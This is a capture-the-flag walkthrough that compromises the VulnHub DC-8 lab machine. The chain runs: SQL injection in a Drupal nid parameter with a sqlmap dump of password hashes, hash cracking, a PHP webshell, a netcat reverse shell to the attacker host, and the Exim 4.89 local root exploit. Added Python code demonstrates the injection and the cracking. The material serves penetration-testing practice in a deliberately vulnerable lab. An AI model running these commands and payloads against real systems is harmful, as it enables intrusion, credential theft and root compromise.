CTF: DC-8 target machine walkthrough
Machine download
https://www.vulnhub.com/entry/dc-8,367/
Machine description (from the VulnHub page)
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing its job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Lab environment
- Attacking VPS (Kali Linux): ip_addr 172.25.0.69
- DC-8 target: mac_addr 00:0c:29:01:84:ae
0x01 Host discovery
ARP scanning identifies the DC-8 machine as 172.25.0.72 (matched against its known MAC address 00:0c:29:01:84:ae):
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
9 Captured ARP Req/Rep packets, from 4 hosts. Total size: 540
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 4 240 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 2 120 VMware, Inc.
172.25.0.72 00:0c:29:01:84:ae 2 120 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 Port scanning
The nmap scan shows two open ports on DC-8: SSH on 22 (OpenSSH 7.4p1, Debian 9) and HTTP on 80 (Apache httpd).
kali@kali:~$ sudo nmap -sV -O 172.25.0.72
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:44 EST
Nmap scan report for 172.25.0.72
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp open http Apache httpd
MAC Address: 00:0C:29:01:84:AE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
0x03 Vulnerability discovery
Open the DC-8 site in a browser.
Clicking Contact Us lands on a page addressed by a numeric `nid` query parameter (`/?nid=3`), i.e. the page is built from a back-end database query.
Manual testing of that parameter shows a numeric (unquoted) SQL injection: appending `AND 1=1` returns the original page, `AND 1=2` does not, and no quote character or comment terminator is needed.
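An added example, not part of the original write-up, showing how the numeric injection in `nid` is confirmed by hand and why a single-column UNION is enough to read the `users` table. It uses an in-memory SQLite database with a constructed `node`/`users` schema standing in for Drupal's `d7db` (the real target runs MariaDB, where `||` would be `CONCAT()`); the hashes are the two from the sqlmap dump further down.

```python
import sqlite3

# Constructed stand-in for the Drupal 7 schema: a node table queried by nid and a
# users table holding the two hashes from the sqlmap dump. Not the real d7db.
USERS = [
    ("admin", "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z"),
    ("john", "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE node (nid INTEGER, title TEXT)")
    db.executemany("INSERT INTO node VALUES (?, ?)",
                   [(1, "Welcome"), (2, "About"), (3, "Contact us")])
    db.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def vulnerable_lookup(db, nid):
    """Numeric injection: nid is concatenated unquoted, so the attacker needs
    neither a quote character nor a comment terminator (cf. nid=3 AND 1508=1508)."""
    return [row[0] for row in db.execute("SELECT title FROM node WHERE nid = " + nid)]


def safe_lookup(db, nid):
    """Hardened form: cast to int and bind; anything non-numeric raises ValueError."""
    return [row[0] for row in
            db.execute("SELECT title FROM node WHERE nid = ?", (int(nid),))]


def boolean_probe(fetch, base="3"):
    """Manual boolean-based check: an always-true condition must leave the
    response unchanged and an always-false one must change it. A request that
    is rejected outright counts as 'not injectable by this route'."""
    try:
        baseline = fetch(base)
        same = fetch(base + " AND 1=1") == baseline
        differs = fetch(base + " AND 1=2") != baseline
    except (ValueError, sqlite3.Error):
        return False
    return same and differs


def union_dump_users(fetch):
    """Single-column UNION (sqlmap reported a 1-column UNION): make the real
    query match nothing, then append the users table. SQLite concatenates with
    ||; MySQL/MariaDB would use CONCAT(name, ':', pass)."""
    rows = fetch("-1 UNION ALL SELECT name || ':' || pass FROM users")
    return dict(row.split(":", 1) for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint injectable:", boolean_probe(lambda n: vulnerable_lookup(db, n)))
    print("hardened endpoint injectable:  ", boolean_probe(lambda n: safe_lookup(db, n)))
    for name, pw_hash in union_dump_users(lambda n: vulnerable_lookup(db, n)).items():
        print(name, pw_hash)
```

The probe is the manual check sqlmap later automates as "boolean-based blind"; the UNION is the last of the four techniques it lists, and is the one that actually pulls whole rows in one request.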
To shortcut the process, run sqlmap against the parameter and dump the `name` and `pass` columns of the `users` table in database `d7db` (sqlmap's option is spelled `--threads` and it caps the value at 10; the run below resumed a stored session, which is why no detection phase appears in the output):
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.72/?nid=3 -D d7db -T users --columns -C "name,pass" --dump --thread 1000
[sqlmap banner] {1.4.2.30#dev} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:40:19 /2020-03-02/
[10:40:20] [INFO] resuming back-end DBMS 'mysql'
[10:40:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=3 AND 1508=1508
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=3 AND (SELECT 3742 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(3742=3742,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=3 AND (SELECT 1530 FROM (SELECT(SLEEP(5)))BpDv)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-5850 UNION ALL SELECT CONCAT(0x7170787671,0x7a536a6f54587261797663525357484d506550475a465646787774544f675a6a506145646e687a7a,0x7178706271)-- -
---
[10:40:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:40:20] [INFO] fetching columns 'name, pass' for table 'users' in database 'd7db'
[10:40:20] [INFO] starting 2 threads
[10:40:20] [INFO] retrieved: 'pass','varchar(128)'
[10:40:20] [INFO] retrieved: 'name','varchar(60)'
Database: d7db
Table: users
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| name | varchar(60) |
| pass | varchar(128) |
+--------+--------------+
[10:40:20] [INFO] fetching entries of column(s) 'name, pass' for table 'users' in database 'd7db'
[10:40:20] [INFO] starting 3 threads
[10:40:21] [INFO] retrieved: '',''
[10:40:21] [INFO] retrieved: 'admin','$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihY...
[10:40:21] [INFO] retrieved: 'john','$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if...
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+
[10:40:21] [INFO] table 'd7db.users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.72\dump\d7db\users.csv'
[10:40:21] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.72'
[*] ending @ 10:40:21 /2020-03-02/
Crack the dumped hashes with john. The `$S$` prefix marks Drupal 7 hashes (iterated SHA-512), which john handles as its Drupal7 format:
vim dc8
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
john dc8
The admin hash did not crack, but john's password came out as:
turtle (john)
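An added example, not from the original write-up: a Python re-implementation of Drupal 7's `$S$` password scheme as defined in its includes/password.inc (iterated SHA-512 over salt+password, encoded with Drupal's own base64 alphabet and truncated to 55 characters). It confirms that "turtle" verifies against john's hash and shows what a wordlist attack like john's is doing per candidate. The two hashes are the ones from the sqlmap dump; the three-word list is constructed for the demo.

```python
import hashlib
import math

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55      # stored hashes are truncated to this length
MIN_LOG2, MAX_LOG2 = 7, 30   # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# The two hashes from the sqlmap dump above.
ADMIN_HASH = "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z"
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def _drupal_b64(data):
    """Drupal's own base64 variant (phpass style): bytes are consumed
    little-endian, six bits at a time, with no padding."""
    out, count, i = [], len(data), 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_hash(password, setting):
    """Recompute a $S$ hash from its 12-char setting: '$S$' + log2(iterations)
    as an ITOA64 digit + 8-char salt. Returns None for a malformed setting."""
    setting = setting[:12]
    if not setting.startswith("$S$") or len(setting) != 12:
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):          # 'D' -> 2**15 = 32768 rounds
        digest = hashlib.sha512(digest + pw).digest()
    output = setting + _drupal_b64(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    return output[:DRUPAL_HASH_LENGTH] if len(output) == expected else None


def check_password(password, stored):
    """Equivalent of Drupal 7's user_check_password() for $S$ hashes."""
    return drupal7_hash(password, stored) == stored


def crack(stored, wordlist):
    """Tiny dictionary attack: first candidate whose hash matches, else None."""
    for word in wordlist:
        if check_password(word, stored):
            return word
    return None


if __name__ == "__main__":
    words = ["password", "123456", "turtle"]   # constructed mini wordlist
    for name, h in (("admin", ADMIN_HASH), ("john", JOHN_HASH)):
        print(name, crack(h, words))
```

The cost per guess is 2^15 SHA-512 rounds (the 'D' digit after `$S$`), which is why a wordlist is the practical route and why admin, whose password is evidently not in the list used, stays uncracked.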
Log in to the back end as john. The Contact Us form's settings page accepts PHP code, so write a PHP one-line webshell there; it is executed whenever a visitor submits the Contact Us form.
Connect to the webshell with AntSword (中国蚁剑).
0x04 SUID privilege escalation
Reverse shell: start a listener on kali first, then trigger the connect-back from the webshell on dc8.
kali: nc -lvvp 7777
dc8: nc -e /bin/bash 172.25.0.69 7777
Look for SUID binaries that www-data can execute.
One entry stands out as a likely SUID privilege-escalation candidate: exim4 (Exim is a mail transfer agent).
That suggests the DC-8 box is running a mail service.
www-data@dc-8:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
Check Exim's version: it is 4.89.
www-data@dc-8:/tmp$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
Search for known vulnerabilities in this version: Exim 4.87 through 4.91 has a local privilege escalation (CVE-2019-10149, exploit-db 46996), which 4.89 falls inside.
kali@kali:~$ searchsploit exim
-------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution | exploits/linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | exploits/linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | exploits/linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution | exploits/linux/remote/25970.py
Exim 3.x - Format String | exploits/linux/local/20900.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | exploits/linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails | exploits/linux/local/1009.c
Exim 4.42 - Local Privilege Escalation | exploits/linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote | exploits/linux/remote/812.c
Exim 4.63 - Remote Command Execution | exploits/linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation | exploits/linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation | exploits/linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | exploits/linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution | exploits/linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service | exploits/multiple/dos/43184.txt
Exim < 4.86.2 - Local Privilege Escalation | exploits/linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | exploits/linux/remote/44571.py
Exim Buffer 1.6.2/1.6.51 - Local Overflow | exploits/unix/local/20333.c
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | exploits/linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String | exploits/linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | exploits/linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | exploits/linux/remote/16925.rb
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
exim 4.90 - Remote Code Execution | exploits/linux/remote/45671.py
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Copy the exploit out of the exploit-db mirror and upload it to /tmp on DC-8 through AntSword:
kali@kali:~$ searchsploit -m 46996.sh
Exploit: Exim 4.87 - 4.91 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/46996
Path: /usr/share/exploitdb/exploits/linux/local/46996.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
cp: overwrite '/home/kali/46996.sh'?
Copied to: /home/kali/46996.sh
The script will not run as-is: searchsploit reports "with CRLF line terminators", and bash trips over the trailing \r on each line.
Fix it before uploading with sed -i 's/\r$//' 46996.sh (dos2unix does the same), then run it from the reverse shell:
kali@kali:~$ nc -lvvp 7777
listening on [any] 7777 ...
172.25.0.72: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.72] 36168
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/var/www/html$ cd /tmp
cd /tmp
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 02 Mar 2020 22:45:19 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j8kRj-0000Hz-Px
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
[ASCII-art banner reading "Well done!!!!"]
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
Privilege escalation succeeded and the flag is read; DC-8 done!
Note that the two-factor authentication on SSH was never touched: the whole chain (SQL injection in the web app, PHP execution from the Drupal back end, then the SUID Exim local exploit) runs over HTTP and a local socket, so 2FA on the SSH login does nothing to stop it.